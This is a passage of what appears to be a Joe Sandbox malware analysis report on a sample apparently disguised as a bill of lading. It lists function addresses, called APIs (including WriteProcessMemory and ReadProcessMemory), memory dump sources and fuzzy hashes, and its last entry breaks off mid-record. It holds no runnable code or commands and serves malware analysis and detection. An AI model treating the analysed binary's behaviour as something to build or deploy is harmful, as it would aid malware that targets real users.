                                                                                                                      Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1489400265-0
                                                                                                                      • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                      • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                      • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                      • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                      Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1042038666-0
                                                                                                                      • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                      • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                      • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                      • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                      Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                      • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                      • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                      • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                      Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                      • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                      • __freefls@4.LIBCMT ref: 00414135
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 132634196-0
                                                                                                                      • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                      • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                                      • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                      • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                                      Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                        • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                      • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                      • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                      • __freeptd.LIBCMT ref: 0041563B
                                                                                                                      • ExitThread.KERNEL32 ref: 00415643
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3798957060-0
                                                                                                                      • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                      • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                      • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                      • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                      Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                      • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                      • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1537469427-0
                                                                                                                      • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                      • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                      • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                      • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                      Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _malloc
                                                                                                                      • String ID: Default$|k
                                                                                                                      • API String ID: 1579825452-2254895183
                                                                                                                      • Opcode ID: 3487a4ebd3b6326aef9d7885c20b94cf9b3333ebd549fd878091b2165ba8d13b
                                                                                                                      • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                      • Opcode Fuzzy Hash: 3487a4ebd3b6326aef9d7885c20b94cf9b3333ebd549fd878091b2165ba8d13b
                                                                                                                      • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                      Function 0044F0B1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID: '$[$h
                                                                                                                      • API String ID: 2931989736-1224472061
                                                                                                                      • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                      • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                                      • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                      • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                                      Function 0044F1F5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncmp
                                                                                                                      • String ID: >$R$U
                                                                                                                      • API String ID: 909875538-1924298640
                                                                                                                      • Opcode ID: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                                                                                      • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                                      • Opcode Fuzzy Hash: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                                                                                      • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                                      Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                      • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                      • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                      • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                      • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                      • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                      • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                      Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 176396367-557222456
                                                                                                                      • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                      • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                                      • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                      • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                                      Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCopyInit_malloc
                                                                                                                      • String ID: 4RH
                                                                                                                      • API String ID: 2981388473-749298218
                                                                                                                      • Opcode ID: 4feaa528d6096a3eb4cb9403f6e39e38e90fdea1ed4b6218c2cb6dc4c25be61b
                                                                                                                      • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                      • Opcode Fuzzy Hash: 4feaa528d6096a3eb4cb9403f6e39e38e90fdea1ed4b6218c2cb6dc4c25be61b
                                                                                                                      • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                      Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                      • String ID: LPT$HH
                                                                                                                      • API String ID: 3035604524-2728063697
                                                                                                                      • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                      • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                      • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                      • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                      Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                        • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
